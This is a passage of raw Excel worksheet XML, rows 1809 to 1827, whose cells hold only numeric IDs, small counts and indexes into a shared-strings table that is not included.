      <c r="E1809" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1809" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1809" s="12" t="s">
        <v>13157</v>
      </c>
      <c r="H1809" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1809" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1809" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1809" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1809" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1809" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1809" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1809" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1809" s="12" t="s">
        <v>8228</v>
      </c>
      <c r="Q1809" s="12" t="s">
        <v>28283</v>
      </c>
      <c r="R1809" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1809" s="12" t="s">
        <v>13158</v>
      </c>
      <c r="T1809" s="12" t="s">
        <v>13159</v>
      </c>
      <c r="U1809" s="12" t="s">
        <v>13160</v>
      </c>
      <c r="V1809" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="W1809" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1809" s="12">
        <v>10</v>
      </c>
      <c r="Y1809" s="12" t="s">
        <v>13161</v>
      </c>
    </row>
    <row r="1810" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1810" s="12">
        <v>9656</v>
      </c>
      <c r="B1810" s="12" t="s">
        <v>30789</v>
      </c>
      <c r="D1810" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1810" s="12" t="s">
        <v>31485</v>
      </c>
      <c r="F1810" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1810" s="12" t="s">
        <v>13171</v>
      </c>
      <c r="H1810" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1810" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1810" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K1810" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1810" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1810" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1810" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1810" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1810" s="12" t="s">
        <v>13113</v>
      </c>
      <c r="Q1810" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1810" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1810" s="12" t="s">
        <v>13172</v>
      </c>
      <c r="T1810" s="12" t="s">
        <v>13118</v>
      </c>
      <c r="U1810" s="12" t="s">
        <v>13173</v>
      </c>
      <c r="V1810" s="12" t="s">
        <v>3095</v>
      </c>
      <c r="W1810" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1810" s="12">
        <v>2</v>
      </c>
      <c r="Y1810" s="12" t="s">
        <v>13174</v>
      </c>
    </row>
    <row r="1811" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1811" s="12">
        <v>9661</v>
      </c>
      <c r="B1811" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1811" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1811" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1811" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G1811" s="12" t="s">
        <v>13175</v>
      </c>
      <c r="H1811" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1811" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1811" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K1811" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1811" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1811" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1811" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1811" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1811" s="12" t="s">
        <v>13176</v>
      </c>
      <c r="Q1811" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1811" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1811" s="12" t="s">
        <v>13177</v>
      </c>
      <c r="T1811" s="12" t="s">
        <v>7813</v>
      </c>
      <c r="U1811" s="12" t="s">
        <v>13178</v>
      </c>
      <c r="V1811" s="12" t="s">
        <v>13179</v>
      </c>
      <c r="W1811" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1811" s="12">
        <v>7</v>
      </c>
      <c r="Y1811" s="12" t="s">
        <v>13180</v>
      </c>
    </row>
    <row r="1812" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1812" s="12">
        <v>9664</v>
      </c>
      <c r="B1812" s="12" t="s">
        <v>31064</v>
      </c>
      <c r="D1812" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1812" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1812" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1812" s="12" t="s">
        <v>13181</v>
      </c>
      <c r="H1812" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1812" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1812" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1812" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1812" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1812" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1812" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1812" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1812" s="12" t="s">
        <v>13113</v>
      </c>
      <c r="Q1812" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1812" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1812" s="12" t="s">
        <v>13182</v>
      </c>
      <c r="T1812" s="12" t="s">
        <v>11935</v>
      </c>
      <c r="U1812" s="12" t="s">
        <v>13183</v>
      </c>
      <c r="V1812" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W1812" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1812" s="12">
        <v>4</v>
      </c>
      <c r="Y1812" s="12" t="s">
        <v>13184</v>
      </c>
    </row>
    <row r="1813" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1813" s="12">
        <v>9670</v>
      </c>
      <c r="B1813" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1813" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D1813" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F1813" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1813" s="12" t="s">
        <v>13191</v>
      </c>
      <c r="H1813" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1813" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1813" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K1813" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1813" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1813" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1813" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1813" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1813" s="12" t="s">
        <v>13192</v>
      </c>
      <c r="Q1813" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1813" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1813" s="12" t="s">
        <v>13193</v>
      </c>
      <c r="T1813" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1813" s="12" t="s">
        <v>13194</v>
      </c>
      <c r="V1813" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1813" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1813" s="12">
        <v>0</v>
      </c>
      <c r="Y1813" s="12" t="s">
        <v>13195</v>
      </c>
    </row>
    <row r="1814" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1814" s="12">
        <v>9673</v>
      </c>
      <c r="B1814" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1814" s="12" t="s">
        <v>30300</v>
      </c>
      <c r="E1814" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1814" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1814" s="12" t="s">
        <v>13196</v>
      </c>
      <c r="H1814" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1814" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1814" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K1814" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1814" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1814" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1814" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1814" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1814" s="12" t="s">
        <v>13197</v>
      </c>
      <c r="Q1814" s="12" t="s">
        <v>31400</v>
      </c>
      <c r="R1814" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1814" s="12" t="s">
        <v>13198</v>
      </c>
      <c r="T1814" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1814" s="12" t="s">
        <v>13199</v>
      </c>
      <c r="V1814" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W1814" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1814" s="12">
        <v>19</v>
      </c>
      <c r="Y1814" s="12" t="s">
        <v>13200</v>
      </c>
    </row>
    <row r="1815" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1815" s="12">
        <v>9674</v>
      </c>
      <c r="B1815" s="12" t="s">
        <v>31274</v>
      </c>
      <c r="D1815" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1815" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1815" s="12" t="s">
        <v>31273</v>
      </c>
      <c r="G1815" s="12" t="s">
        <v>13201</v>
      </c>
      <c r="H1815" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1815" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1815" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1815" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1815" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1815" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1815" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1815" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1815" s="12" t="s">
        <v>13202</v>
      </c>
      <c r="Q1815" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1815" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1815" s="12" t="s">
        <v>13203</v>
      </c>
      <c r="T1815" s="12" t="s">
        <v>11888</v>
      </c>
      <c r="U1815" s="12" t="s">
        <v>13204</v>
      </c>
      <c r="V1815" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W1815" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1815" s="12">
        <v>27</v>
      </c>
      <c r="Y1815" s="12" t="s">
        <v>13205</v>
      </c>
    </row>
    <row r="1816" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1816" s="12">
        <v>9677</v>
      </c>
      <c r="B1816" s="12" t="s">
        <v>31057</v>
      </c>
      <c r="D1816" s="12" t="s">
        <v>31065</v>
      </c>
      <c r="F1816" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1816" s="12" t="s">
        <v>13206</v>
      </c>
      <c r="H1816" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1816" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1816" s="12" t="s">
        <v>9893</v>
      </c>
      <c r="K1816" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1816" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1816" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1816" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1816" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1816" s="12" t="s">
        <v>13053</v>
      </c>
      <c r="Q1816" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1816" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1816" s="12" t="s">
        <v>13207</v>
      </c>
      <c r="T1816" s="12" t="s">
        <v>8584</v>
      </c>
      <c r="U1816" s="12" t="s">
        <v>13208</v>
      </c>
      <c r="V1816" s="12" t="s">
        <v>9896</v>
      </c>
      <c r="W1816" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1816" s="12">
        <v>9</v>
      </c>
      <c r="Y1816" s="12" t="s">
        <v>13209</v>
      </c>
    </row>
    <row r="1817" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1817" s="12">
        <v>9681</v>
      </c>
      <c r="B1817" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1817" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1817" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1817" s="12" t="s">
        <v>13210</v>
      </c>
      <c r="H1817" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1817" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1817" s="12" t="s">
        <v>1589</v>
      </c>
      <c r="K1817" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1817" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1817" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1817" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1817" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1817" s="12" t="s">
        <v>13113</v>
      </c>
      <c r="Q1817" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1817" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1817" s="12" t="s">
        <v>13211</v>
      </c>
      <c r="T1817" s="12" t="s">
        <v>9300</v>
      </c>
      <c r="U1817" s="12" t="s">
        <v>13212</v>
      </c>
      <c r="V1817" s="12" t="s">
        <v>9300</v>
      </c>
      <c r="W1817" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1817" s="12">
        <v>1</v>
      </c>
      <c r="Y1817" s="12" t="s">
        <v>13213</v>
      </c>
    </row>
    <row r="1818" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1818" s="12">
        <v>9683</v>
      </c>
      <c r="B1818" s="12" t="s">
        <v>30836</v>
      </c>
      <c r="D1818" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1818" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1818" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1818" s="12" t="s">
        <v>13214</v>
      </c>
      <c r="H1818" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1818" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1818" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K1818" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1818" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1818" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1818" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1818" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1818" s="12" t="s">
        <v>12596</v>
      </c>
      <c r="Q1818" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1818" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1818" s="12" t="s">
        <v>13215</v>
      </c>
      <c r="T1818" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1818" s="12" t="s">
        <v>13216</v>
      </c>
      <c r="V1818" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W1818" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1818" s="12">
        <v>4</v>
      </c>
      <c r="Y1818" s="12" t="s">
        <v>13217</v>
      </c>
    </row>
    <row r="1819" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1819" s="12">
        <v>9684</v>
      </c>
      <c r="B1819" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1819" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1819" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1819" s="12" t="s">
        <v>31066</v>
      </c>
      <c r="G1819" s="12" t="s">
        <v>13218</v>
      </c>
      <c r="H1819" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1819" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1819" s="12" t="s">
        <v>2643</v>
      </c>
      <c r="K1819" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1819" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1819" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1819" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1819" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1819" s="12" t="s">
        <v>13219</v>
      </c>
      <c r="Q1819" s="12" t="s">
        <v>28331</v>
      </c>
      <c r="R1819" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1819" s="12" t="s">
        <v>13220</v>
      </c>
      <c r="T1819" s="12" t="s">
        <v>13140</v>
      </c>
      <c r="U1819" s="12" t="s">
        <v>13221</v>
      </c>
      <c r="V1819" s="12" t="s">
        <v>13140</v>
      </c>
      <c r="W1819" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1819" s="12">
        <v>6</v>
      </c>
      <c r="Y1819" s="12" t="s">
        <v>13222</v>
      </c>
    </row>
    <row r="1820" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1820" s="12">
        <v>9691</v>
      </c>
      <c r="B1820" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D1820" s="12" t="s">
        <v>30454</v>
      </c>
      <c r="E1820" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1820" s="12" t="s">
        <v>30459</v>
      </c>
      <c r="G1820" s="12" t="s">
        <v>13223</v>
      </c>
      <c r="H1820" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1820" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1820" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1820" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1820" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1820" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1820" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1820" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1820" s="12" t="s">
        <v>12892</v>
      </c>
      <c r="Q1820" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1820" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1820" s="12" t="s">
        <v>13224</v>
      </c>
      <c r="T1820" s="12" t="s">
        <v>13225</v>
      </c>
      <c r="U1820" s="12" t="s">
        <v>13226</v>
      </c>
      <c r="V1820" s="12" t="s">
        <v>5211</v>
      </c>
      <c r="W1820" s="12">
        <v>9686</v>
      </c>
      <c r="X1820" s="12">
        <v>4</v>
      </c>
      <c r="Y1820" s="12" t="s">
        <v>13227</v>
      </c>
    </row>
    <row r="1821" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1821" s="12">
        <v>9696</v>
      </c>
      <c r="B1821" s="12" t="s">
        <v>31057</v>
      </c>
      <c r="D1821" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1821" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1821" s="12" t="s">
        <v>31046</v>
      </c>
      <c r="G1821" s="12" t="s">
        <v>13228</v>
      </c>
      <c r="H1821" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1821" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1821" s="12" t="s">
        <v>728</v>
      </c>
      <c r="K1821" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1821" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1821" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1821" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1821" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1821" s="12" t="s">
        <v>13113</v>
      </c>
      <c r="Q1821" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1821" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1821" s="12" t="s">
        <v>13229</v>
      </c>
      <c r="T1821" s="12" t="s">
        <v>10471</v>
      </c>
      <c r="U1821" s="12" t="s">
        <v>13230</v>
      </c>
      <c r="V1821" s="12" t="s">
        <v>13231</v>
      </c>
      <c r="W1821" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1821" s="12">
        <v>14</v>
      </c>
      <c r="Y1821" s="12" t="s">
        <v>13232</v>
      </c>
    </row>
    <row r="1822" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1822" s="12">
        <v>9699</v>
      </c>
      <c r="B1822" s="12" t="s">
        <v>31067</v>
      </c>
      <c r="D1822" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1822" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1822" s="12" t="s">
        <v>31066</v>
      </c>
      <c r="G1822" s="12" t="s">
        <v>13237</v>
      </c>
      <c r="H1822" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1822" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J1822" s="12" t="s">
        <v>13238</v>
      </c>
      <c r="K1822" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1822" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1822" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1822" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1822" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1822" s="12" t="s">
        <v>13113</v>
      </c>
      <c r="Q1822" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1822" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1822" s="12" t="s">
        <v>13239</v>
      </c>
      <c r="T1822" s="12" t="s">
        <v>10471</v>
      </c>
      <c r="U1822" s="12" t="s">
        <v>13240</v>
      </c>
      <c r="V1822" s="12" t="s">
        <v>5211</v>
      </c>
      <c r="W1822" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1822" s="12">
        <v>11</v>
      </c>
      <c r="Y1822" s="12" t="s">
        <v>13241</v>
      </c>
    </row>
    <row r="1823" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1823" s="12">
        <v>9701</v>
      </c>
      <c r="B1823" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1823" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1823" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="E1823" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1823" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1823" s="12" t="s">
        <v>13242</v>
      </c>
      <c r="H1823" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1823" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1823" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K1823" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1823" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1823" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1823" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1823" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1823" s="12" t="s">
        <v>4774</v>
      </c>
      <c r="Q1823" s="12">
        <v>2.6</v>
      </c>
      <c r="R1823" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1823" s="12" t="s">
        <v>13243</v>
      </c>
      <c r="T1823" s="12" t="s">
        <v>518</v>
      </c>
      <c r="U1823" s="12" t="s">
        <v>13244</v>
      </c>
      <c r="V1823" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W1823" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1823" s="12">
        <v>2</v>
      </c>
      <c r="Y1823" s="12" t="s">
        <v>13245</v>
      </c>
    </row>
    <row r="1824" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1824" s="12">
        <v>9704</v>
      </c>
      <c r="B1824" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1824" s="12" t="s">
        <v>31034</v>
      </c>
      <c r="E1824" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1824" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1824" s="12" t="s">
        <v>13246</v>
      </c>
      <c r="H1824" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1824" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1824" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K1824" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1824" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1824" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1824" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1824" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1824" s="12" t="s">
        <v>13219</v>
      </c>
      <c r="Q1824" s="12" t="s">
        <v>28331</v>
      </c>
      <c r="R1824" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1824" s="12" t="s">
        <v>13247</v>
      </c>
      <c r="T1824" s="12" t="s">
        <v>13140</v>
      </c>
      <c r="U1824" s="12" t="s">
        <v>13248</v>
      </c>
      <c r="V1824" s="12" t="s">
        <v>4235</v>
      </c>
      <c r="W1824" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1824" s="12">
        <v>3</v>
      </c>
      <c r="Y1824" s="12" t="s">
        <v>13249</v>
      </c>
    </row>
    <row r="1825" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1825" s="12">
        <v>9708</v>
      </c>
      <c r="B1825" s="12" t="s">
        <v>30674</v>
      </c>
      <c r="D1825" s="12" t="s">
        <v>30678</v>
      </c>
      <c r="E1825" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F1825" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1825" s="12" t="s">
        <v>13250</v>
      </c>
      <c r="H1825" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1825" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1825" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K1825" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1825" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1825" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1825" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1825" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1825" s="12" t="s">
        <v>13251</v>
      </c>
      <c r="Q1825" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1825" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1825" s="12" t="s">
        <v>13252</v>
      </c>
      <c r="T1825" s="12" t="s">
        <v>13253</v>
      </c>
      <c r="U1825" s="12" t="s">
        <v>13254</v>
      </c>
      <c r="V1825" s="12" t="s">
        <v>84</v>
      </c>
      <c r="W1825" s="12">
        <v>9151</v>
      </c>
      <c r="X1825" s="12">
        <v>28</v>
      </c>
      <c r="Y1825" s="12" t="s">
        <v>13255</v>
      </c>
    </row>
    <row r="1826" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1826" s="12">
        <v>9709</v>
      </c>
      <c r="B1826" s="12" t="s">
        <v>31190</v>
      </c>
      <c r="D1826" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1826" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1826" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1826" s="12" t="s">
        <v>13256</v>
      </c>
      <c r="H1826" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1826" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1826" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K1826" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1826" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1826" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1826" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1826" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1826" s="12" t="s">
        <v>13257</v>
      </c>
      <c r="Q1826" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1826" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1826" s="12" t="s">
        <v>13258</v>
      </c>
      <c r="T1826" s="12" t="s">
        <v>13259</v>
      </c>
      <c r="U1826" s="12" t="s">
        <v>13260</v>
      </c>
      <c r="V1826" s="12" t="s">
        <v>6391</v>
      </c>
      <c r="W1826" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1826" s="12">
        <v>19</v>
      </c>
      <c r="Y1826" s="12" t="s">
        <v>13261</v>
      </c>
    </row>
    <row r="1827" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1827" s="12">
        <v>9710</v>
      </c>
      <c r="B1827" s="12" t="s">
        <v>31190</v>
      </c>
      <c r="D1827" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1827" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1827" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1827" s="12" t="s">
        <v>13262</v>
      </c>
      <c r="H1827" s="12" t="s">
        <v>21</v>
      </c>
